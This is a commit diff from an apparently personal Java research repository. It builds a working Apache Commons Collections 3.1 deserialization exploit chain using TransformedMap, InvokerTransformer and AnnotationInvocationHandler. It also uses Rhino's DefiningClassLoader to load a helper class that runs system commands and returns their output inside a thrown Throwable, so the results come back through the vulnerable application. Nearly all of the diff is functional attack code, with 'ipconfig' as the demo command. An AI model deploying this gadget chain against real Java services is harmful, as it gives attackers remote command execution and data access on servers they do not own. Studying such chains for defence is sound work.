新增define利用，实现反序列化漏洞回显

Author: xuanyonghao

pom.xml

@@ -33,21 +33,12 @@
     </dependency>
 
     <dependency>
-      <groupId>io.protostuff</groupId>
-      <artifactId>protostuff-core</artifactId>
-      <version>1.4.4</version>
-    </dependency>
-    <dependency>
-      <groupId>io.protostuff</groupId>
-      <artifactId>protostuff-runtime</artifactId>
-      <version>1.4.4</version>
-    </dependency>
-    <dependency>
-      <groupId>com.xyh.serialization_utils</groupId>
-      <artifactId>Serialization-Utils</artifactId>
-      <version>1.0-SNAPSHOT</version>
+      <groupId>org.mozilla</groupId>
+      <artifactId>rhino</artifactId>
+      <version>1.7.6</version>
     </dependency>
 
+
   </dependencies>
 
   <build>

src/main/java/com/xyh/collections3/SerializeUtil.java

@@ -0,0 +1,36 @@
+package com.xyh.collections3;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+
+/**
+ * Created by xuanyonghao on 2018/5/5.
+ */
+public class SerializeUtil {
+    /**
+     * 序列化
+     *
+     */
+    public static byte[] serialize(Object o) throws Exception {
+        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
+        objectOutputStream.writeObject(o);
+        byte[] bytes = byteArrayOutputStream.toByteArray();
+        objectOutputStream.close();
+        return bytes;
+    }
+
+    /**
+     * 反序列化
+     *
+     */
+    public static <T>T deserialize(byte[] bytes) throws Exception {
+        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
+        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
+        T o = (T) objectInputStream.readObject();
+        objectInputStream.close();
+        return o;
+    }
+}

src/main/java/com/xyh/collections3/no1/SerializeMapForTransformer.java

@@ -1,6 +1,7 @@
 package com.xyh.collections3.no1;
 
 
+import com.xyh.collections3.SerializeUtil;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
@@ -58,9 +59,9 @@ private static void testAnnotationInvocationHandlerMap(Transformer transformer)
         ctor.setAccessible(true);
         InvocationHandler o = (InvocationHandler) ctor.newInstance(Target.class,ouputMap);
         //序列化输出
-        byte[] bytes = serialize(o);
+        byte[] bytes = SerializeUtil.serialize(o);
         //反序列化
-        deserialize(bytes);
+        SerializeUtil.deserialize(bytes);
     }
 
     /**
@@ -71,9 +72,9 @@ private static void testMap(Transformer transformer) throws Exception{
         //转化map
         Map ouputMap = TransformedMap.decorate(new HashMap<>(),null,transformer);
         //序列化输出
-        byte[] bytes = serialize(ouputMap);
+        byte[] bytes = SerializeUtil.serialize(ouputMap);
         //反序列化
-        Map innerMap = deserialize(bytes);
+        Map innerMap = SerializeUtil.deserialize(bytes);
         //put操作触发，命令链
         innerMap.put("2","orange");
     }
@@ -85,34 +86,10 @@ private static void testMap(Transformer transformer) throws Exception{
     private static void testReadObject() throws Exception {
         A a = new A();
         //序列化
-        byte[] bytes = serialize(a);
-        A a1 = deserialize(bytes);
+        byte[] bytes = SerializeUtil.serialize(a);
+        A a1 = SerializeUtil.deserialize(bytes);
     }
 
-    /**
-     * 序列化
-     *
-     */
-    private static byte[] serialize(Object o) throws Exception {
-        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
-        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
-        objectOutputStream.writeObject(o);
-        byte[] bytes = byteArrayOutputStream.toByteArray();
-        objectOutputStream.close();
-        return bytes;
-    }
-
-    /**
-     * 反序列化
-     *
-     */
-    private static <T>T deserialize(byte[] bytes) throws Exception {
-        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
-        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
-        T o = (T) objectInputStream.readObject();
-        objectInputStream.close();
-        return o;
-    }
 }
 
 /**

src/main/java/com/xyh/collections3/no2/CallbackRuntime.java

@@ -0,0 +1,19 @@
+package com.xyh.collections3.no2;
+
+import java.io.BufferedInputStream;
+
+/**
+ * Created by xuanyonghao on 2018/5/5.
+ */
+public class CallbackRuntime {
+    public void exec(String cmd) throws Throwable {
+        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
+        StringBuilder stringBuilder = new StringBuilder();
+        byte[] bytes = new byte[4096];
+        int len = 0;
+        while ((len = bufferedInputStream.read(bytes)) != -1)
+            stringBuilder.append(new String(bytes));
+        //此处最好不要使用Exception异常类，因为很多web项目可能会全局捕获该异常
+        throw new Throwable(stringBuilder.toString());
+    }
+}

src/main/java/com/xyh/collections3/no2/SerializeMapForTransformer.java

@@ -0,0 +1,67 @@
+package com.xyh.collections3.no2;
+
+import com.xyh.collections3.SerializeUtil;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+import org.mozilla.javascript.DefiningClassLoader;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.lang.annotation.Target;
+import java.lang.reflect.Constructor;
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+ * 此处基于Collections3.1中的TransformedMap利用漏洞，并进一步利用defineCLass构造回显,回显利用异常抛出带回，
+ * 但由于DefiningClassLoader类所属jar包使用范围有限，而且AnnotationInvocationHandler的利用也仅限jdk1.8以下，
+ * 使得这样的利用链可用性不高。
+ *
+ * Created by xuanyonghao on 2018/5/4.
+ */
+public class SerializeMapForTransformer {
+    public static void main(String[] args) throws Throwable {
+//        testCallbackRuntime();
+
+        testAnnotationInvocationHandlerForDefineClass();
+    }
+
+    private static void testAnnotationInvocationHandlerForDefineClass() throws Exception {
+        Transformer[] transformers = new Transformer[]{
+                new ConstantTransformer(DefiningClassLoader.class),
+                new InvokerTransformer("getConstructor",new Class[]{Class[].class},new Object[]{new Class[0]}),
+                new InvokerTransformer("newInstance",new Class[]{Object[].class},new Object[]{new Object[0]}),
+                new InvokerTransformer("defineClass",new Class[]{String.class,byte[].class},new Object[]{"com.xyh.collections3.no2.CallbackRuntime",readCallbackRuntimeClassBytes()}),
+                new InvokerTransformer("newInstance",new Class[]{},new Object[]{}),
+                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"ipconfig"})
+        };
+        Transformer transformer = new ChainedTransformer(transformers);
+        Map inner = new HashMap();
+        inner.put("value","value");
+        Map ouputMap = TransformedMap.decorate(inner,null,transformer);
+        Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class,Map.class);
+        ctor.setAccessible(true);
+        Object o = ctor.newInstance(Target.class,ouputMap);
+        //序列化输出
+        byte[] bytes = SerializeUtil.serialize(o);
+        //反序列化
+        SerializeUtil.deserialize(bytes);
+    }
+
+    private static byte[] readCallbackRuntimeClassBytes() throws IOException {
+        //执行前先编译CallbackRuntime类得到class文件
+        FileInputStream fileInputStream = new FileInputStream(new File("target/classes/com/xyh/collections3/no2/CallbackRuntime.class"));
+        byte[] bytes = new byte[fileInputStream.available()];
+        fileInputStream.read(bytes);
+        return bytes;
+    }
+
+    private static void testCallbackRuntime() throws Throwable {
+        new CallbackRuntime().exec("ipconfig");
+    }
+
+}